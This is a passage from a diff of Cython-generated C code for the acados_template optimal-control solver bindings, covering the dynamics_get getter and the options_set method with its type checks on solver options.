__pyx_t_4 = 0; + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_5); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_5); + __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (PyDict_SetItem(__pyx_t_5, __pyx_n_s_order, __pyx_n_u_F) < 0) __PYX_ERR(0, 633, __pyx_L1_error) + __pyx_t_1 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_4, __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (!(likely(((__pyx_t_1) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_1, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 633, __pyx_L1_error) + __pyx_t_6 = ((PyArrayObject *)__pyx_t_1); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_out.rcbuffer->pybuffer, (PyObject*)__pyx_t_6, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 2, 0, __pyx_stack) == -1)) { + __pyx_v_out = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_out.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 633, __pyx_L1_error) + } else {__pyx_pybuffernd_out.diminfo[0].strides = __pyx_pybuffernd_out.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_out.diminfo[0].shape = __pyx_pybuffernd_out.rcbuffer->pybuffer.shape[0]; __pyx_pybuffernd_out.diminfo[1].strides = __pyx_pybuffernd_out.rcbuffer->pybuffer.strides[1]; __pyx_pybuffernd_out.diminfo[1].shape = __pyx_pybuffernd_out.rcbuffer->pybuffer.shape[1]; + } + } + __pyx_t_6 = 0; + __pyx_v_out = ((PyArrayObject *)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":636 + * + * # call getter + * acados_solver_common.ocp_nlp_get_at_stage(self.nlp_config, self.nlp_dims, self.nlp_solver, stage, field, out.data) # <<<<<<<<<<<<<< + * + * return out + */ + __pyx_t_7 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_7) && PyErr_Occurred())) __PYX_ERR(0, 636, __pyx_L1_error) + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_out)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 636, __pyx_L1_error) + ocp_nlp_get_at_stage(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_solver, __pyx_v_stage, __pyx_t_7, ((void *)__pyx_t_8)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":638 + * acados_solver_common.ocp_nlp_get_at_stage(self.nlp_config, self.nlp_dims, self.nlp_solver, stage, field, out.data) + * + * return out # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_out); + __pyx_r = ((PyObject *)__pyx_v_out); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":619 + * + * + * def dynamics_get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get numerical data from the dynamics module of the solver: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.dynamics_get", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XDECREF((PyObject *)__pyx_v_out); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":641 + * + * + * def options_set(self, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set options of the solver. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_43options_set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_42options_set, "\n Set options of the solver.\n\n :param field: string, e.g. 'print_level', 'rti_phase', 'initialize_t_slacks', 'step_length', 'alpha_min', 'alpha_reduction', 'qp_warm_start', 'line_search_use_sufficient_descent', 'full_step_dual', 'globalization_use_SOC', 'qp_tol_stat', 'qp_tol_eq', 'qp_tol_ineq', 'qp_tol_comp', 'qp_tau_min', 'qp_mu0'\n\n :param value: of type int, float, string\n\n - qp_tol_stat: QP solver tolerance stationarity\n - qp_tol_eq: QP solver tolerance equalities\n - qp_tol_ineq: QP solver tolerance inequalities\n - qp_tol_comp: QP solver tolerance complementarity\n - qp_tau_min: for HPIPM QP solvers: minimum value of barrier parameter in HPIPM\n - qp_mu0: for HPIPM QP solvers: initial value for complementarity slackness\n - warm_start_first_qp: indicates if first QP in SQP is warm_started\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_43options_set = {"options_set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_43options_set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_42options_set}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_43options_set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_field_ = 0; + PyObject *__pyx_v_value_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("options_set (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_field_2,&__pyx_n_s_value,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 641, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_value)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 641, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("options_set", 1, 2, 2, 1); __PYX_ERR(0, 641, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "options_set") < 0)) __PYX_ERR(0, 641, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_field_ = ((PyObject*)values[0]); + __pyx_v_value_ = values[1]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("options_set", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 641, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.options_set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_field_), (&PyUnicode_Type), 1, "field_", 1))) __PYX_ERR(0, 641, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_42options_set(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_field_, __pyx_v_value_); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_42options_set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_) { + PyObject *__pyx_v_int_fields = NULL; + PyObject *__pyx_v_double_fields = NULL; + PyObject *__pyx_v_string_fields = NULL; + PyObject *__pyx_v_field = NULL; + int __pyx_v_int_value; + double __pyx_v_double_value; + __Pyx_memviewslice __pyx_v_string_value = { 0, 0, { 0 }, { 0 }, { 0 } }; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + int __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + char const *__pyx_t_7; + double __pyx_t_8; + __Pyx_memviewslice __pyx_t_9 = { 0, 0, { 0 }, { 0 }, { 0 } }; + Py_ssize_t __pyx_t_10; + PyObject *__pyx_t_11 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("options_set", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":657 + * - warm_start_first_qp: indicates if first QP in SQP is warm_started + * """ + * int_fields = ['print_level', 'rti_phase', 'initialize_t_slacks', 'qp_warm_start', 'line_search_use_sufficient_descent', 'full_step_dual', 'globalization_use_SOC', 'warm_start_first_qp'] # <<<<<<<<<<<<<< + * double_fields = ['step_length', 'tol_eq', 'tol_stat', 'tol_ineq', 'tol_comp', 'alpha_min', 'alpha_reduction', 'eps_sufficient_descent', + * 'qp_tol_stat', 'qp_tol_eq', 'qp_tol_ineq', 'qp_tol_comp', 'qp_tau_min', 'qp_mu0'] + */ + __pyx_t_1 = PyList_New(8); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 657, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_print_level); + __Pyx_GIVEREF(__pyx_n_u_print_level); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_print_level); + __Pyx_INCREF(__pyx_n_u_rti_phase); + __Pyx_GIVEREF(__pyx_n_u_rti_phase); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_rti_phase); + __Pyx_INCREF(__pyx_n_u_initialize_t_slacks); + __Pyx_GIVEREF(__pyx_n_u_initialize_t_slacks); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_initialize_t_slacks); + __Pyx_INCREF(__pyx_n_u_qp_warm_start); + __Pyx_GIVEREF(__pyx_n_u_qp_warm_start); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_qp_warm_start); + __Pyx_INCREF(__pyx_n_u_line_search_use_sufficient_desce); + __Pyx_GIVEREF(__pyx_n_u_line_search_use_sufficient_desce); + PyList_SET_ITEM(__pyx_t_1, 4, __pyx_n_u_line_search_use_sufficient_desce); + __Pyx_INCREF(__pyx_n_u_full_step_dual); + __Pyx_GIVEREF(__pyx_n_u_full_step_dual); + PyList_SET_ITEM(__pyx_t_1, 5, __pyx_n_u_full_step_dual); + __Pyx_INCREF(__pyx_n_u_globalization_use_SOC); + __Pyx_GIVEREF(__pyx_n_u_globalization_use_SOC); + PyList_SET_ITEM(__pyx_t_1, 6, __pyx_n_u_globalization_use_SOC); + __Pyx_INCREF(__pyx_n_u_warm_start_first_qp); + __Pyx_GIVEREF(__pyx_n_u_warm_start_first_qp); + PyList_SET_ITEM(__pyx_t_1, 7, __pyx_n_u_warm_start_first_qp); + __pyx_v_int_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":658 + * """ + * int_fields = ['print_level', 'rti_phase', 'initialize_t_slacks', 'qp_warm_start', 'line_search_use_sufficient_descent', 'full_step_dual', 'globalization_use_SOC', 'warm_start_first_qp'] + * double_fields = ['step_length', 'tol_eq', 'tol_stat', 'tol_ineq', 'tol_comp', 'alpha_min', 'alpha_reduction', 'eps_sufficient_descent', # <<<<<<<<<<<<<< + * 'qp_tol_stat', 'qp_tol_eq', 'qp_tol_ineq', 'qp_tol_comp', 'qp_tau_min', 'qp_mu0'] + * string_fields = ['globalization'] + */ + __pyx_t_1 = PyList_New(14); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 658, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_step_length); + __Pyx_GIVEREF(__pyx_n_u_step_length); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_step_length); + __Pyx_INCREF(__pyx_n_u_tol_eq); + __Pyx_GIVEREF(__pyx_n_u_tol_eq); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_tol_eq); + __Pyx_INCREF(__pyx_n_u_tol_stat); + __Pyx_GIVEREF(__pyx_n_u_tol_stat); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_tol_stat); + __Pyx_INCREF(__pyx_n_u_tol_ineq); + __Pyx_GIVEREF(__pyx_n_u_tol_ineq); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_tol_ineq); + __Pyx_INCREF(__pyx_n_u_tol_comp); + __Pyx_GIVEREF(__pyx_n_u_tol_comp); + PyList_SET_ITEM(__pyx_t_1, 4, __pyx_n_u_tol_comp); + __Pyx_INCREF(__pyx_n_u_alpha_min); + __Pyx_GIVEREF(__pyx_n_u_alpha_min); + PyList_SET_ITEM(__pyx_t_1, 5, __pyx_n_u_alpha_min); + __Pyx_INCREF(__pyx_n_u_alpha_reduction); + __Pyx_GIVEREF(__pyx_n_u_alpha_reduction); + PyList_SET_ITEM(__pyx_t_1, 6, __pyx_n_u_alpha_reduction); + __Pyx_INCREF(__pyx_n_u_eps_sufficient_descent); + __Pyx_GIVEREF(__pyx_n_u_eps_sufficient_descent); + PyList_SET_ITEM(__pyx_t_1, 7, __pyx_n_u_eps_sufficient_descent); + __Pyx_INCREF(__pyx_n_u_qp_tol_stat); + __Pyx_GIVEREF(__pyx_n_u_qp_tol_stat); + PyList_SET_ITEM(__pyx_t_1, 8, __pyx_n_u_qp_tol_stat); + __Pyx_INCREF(__pyx_n_u_qp_tol_eq); + __Pyx_GIVEREF(__pyx_n_u_qp_tol_eq); + PyList_SET_ITEM(__pyx_t_1, 9, __pyx_n_u_qp_tol_eq); + __Pyx_INCREF(__pyx_n_u_qp_tol_ineq); + __Pyx_GIVEREF(__pyx_n_u_qp_tol_ineq); + PyList_SET_ITEM(__pyx_t_1, 10, __pyx_n_u_qp_tol_ineq); + __Pyx_INCREF(__pyx_n_u_qp_tol_comp); + __Pyx_GIVEREF(__pyx_n_u_qp_tol_comp); + PyList_SET_ITEM(__pyx_t_1, 11, __pyx_n_u_qp_tol_comp); + __Pyx_INCREF(__pyx_n_u_qp_tau_min); + __Pyx_GIVEREF(__pyx_n_u_qp_tau_min); + PyList_SET_ITEM(__pyx_t_1, 12, __pyx_n_u_qp_tau_min); + __Pyx_INCREF(__pyx_n_u_qp_mu0); + __Pyx_GIVEREF(__pyx_n_u_qp_mu0); + PyList_SET_ITEM(__pyx_t_1, 13, __pyx_n_u_qp_mu0); + __pyx_v_double_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":660 + * double_fields = ['step_length', 'tol_eq', 'tol_stat', 'tol_ineq', 'tol_comp', 'alpha_min', 'alpha_reduction', 'eps_sufficient_descent', + * 'qp_tol_stat', 'qp_tol_eq', 'qp_tol_ineq', 'qp_tol_comp', 'qp_tau_min', 'qp_mu0'] + * string_fields = ['globalization'] # <<<<<<<<<<<<<< + * + * # encode + */ + __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 660, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_globalization); + __Pyx_GIVEREF(__pyx_n_u_globalization); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_globalization); + __pyx_v_string_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":663 + * + * # encode + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * cdef int int_value + */ + if (unlikely(__pyx_v_field_ == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 663, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_field = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":670 + * + * # check field availability and type + * if field_ in int_fields: # <<<<<<<<<<<<<< + * if not isinstance(value_, int): + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) + */ + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_int_fields, Py_EQ)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 670, __pyx_L1_error) + if (__pyx_t_2) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":671 + * # check field availability and type + * if field_ in int_fields: + * if not isinstance(value_, int): # <<<<<<<<<<<<<< + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) + * + */ + __pyx_t_2 = PyInt_Check(__pyx_v_value_); + __pyx_t_3 = (!__pyx_t_2); + if (unlikely(__pyx_t_3)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":672 + * if field_ in int_fields: + * if not isinstance(value_, int): + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) # <<<<<<<<<<<<<< + * + * if field_ == 'rti_phase': + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_solver_option_must_be_of_type_in, __pyx_n_s_format); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 672, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_field_, ((PyObject *)Py_TYPE(__pyx_v_value_))}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 672, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_t_4 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 672, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(0, 672, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":671 + * # check field availability and type + * if field_ in int_fields: + * if not isinstance(value_, int): # <<<<<<<<<<<<<< + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":674 + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) + * + * if field_ == 'rti_phase': # <<<<<<<<<<<<<< + * if value_ < 0 or value_ > 2: + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + */ + __pyx_t_3 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_rti_phase, Py_EQ)); if (unlikely((__pyx_t_3 < 0))) __PYX_ERR(0, 674, __pyx_L1_error) + if (__pyx_t_3) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":675 + * + * if field_ == 'rti_phase': + * if value_ < 0 or value_ > 2: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + */ + __pyx_t_4 = PyObject_RichCompare(__pyx_v_value_, __pyx_int_0, Py_LT); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 675, __pyx_L1_error) + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 675, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (!__pyx_t_2) { + } else { + __pyx_t_3 = __pyx_t_2; + goto __pyx_L7_bool_binop_done; + } + __pyx_t_4 = PyObject_RichCompare(__pyx_v_value_, __pyx_int_2, Py_GT); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 675, __pyx_L1_error) + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 675, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_3 = __pyx_t_2; + __pyx_L7_bool_binop_done:; + if (unlikely(__pyx_t_3)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":676 + * if field_ == 'rti_phase': + * if value_ < 0 or value_ > 2: + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' # <<<<<<<<<<<<<< + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + * if self.nlp_solver_type != 'SQP_RTI' and value_ > 0: + */ + __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_tuple__27, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 676, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(0, 676, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":675 + * + * if field_ == 'rti_phase': + * if value_ < 0 or value_ > 2: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":678 + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + * if self.nlp_solver_type != 'SQP_RTI' and value_ > 0: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + * 'take only value 0 for SQP-type solvers') + */ + __pyx_t_2 = (__Pyx_PyUnicode_Equals(__pyx_v_self->nlp_solver_type, __pyx_n_u_SQP_RTI, Py_NE)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 678, __pyx_L1_error) + if (__pyx_t_2) { + } else { + __pyx_t_3 = __pyx_t_2; + goto __pyx_L10_bool_binop_done; + } + __pyx_t_4 = PyObject_RichCompare(__pyx_v_value_, __pyx_int_0, Py_GT); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 678, __pyx_L1_error) + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 678, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_3 = __pyx_t_2; + __pyx_L10_bool_binop_done:; + if (unlikely(__pyx_t_3)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":679 + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + * if self.nlp_solver_type != 'SQP_RTI' and value_ > 0: + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' # <<<<<<<<<<<<<< + * 'take only value 0 for SQP-type solvers') + * + */ + __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_tuple__28, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 679, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(0, 679, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":678 + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + * if self.nlp_solver_type != 'SQP_RTI' and value_ > 0: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + * 'take only value 0 for SQP-type solvers') + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":674 + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) + * + * if field_ == 'rti_phase': # <<<<<<<<<<<<<< + * if value_ < 0 or value_ > 2: + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":682 + * 'take only value 0 for SQP-type solvers') + * + * int_value = value_ # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &int_value) + * + */ + __pyx_t_6 = __Pyx_PyInt_As_int(__pyx_v_value_); if (unlikely((__pyx_t_6 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 682, __pyx_L1_error) + __pyx_v_int_value = __pyx_t_6; + + /* "acados_template/acados_ocp_solver_pyx.pyx":683 + * + * int_value = value_ + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &int_value) # <<<<<<<<<<<<<< + * + * elif field_ in double_fields: + */ + __pyx_t_7 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_7) && PyErr_Occurred())) __PYX_ERR(0, 683, __pyx_L1_error) + ocp_nlp_solver_opts_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_opts, 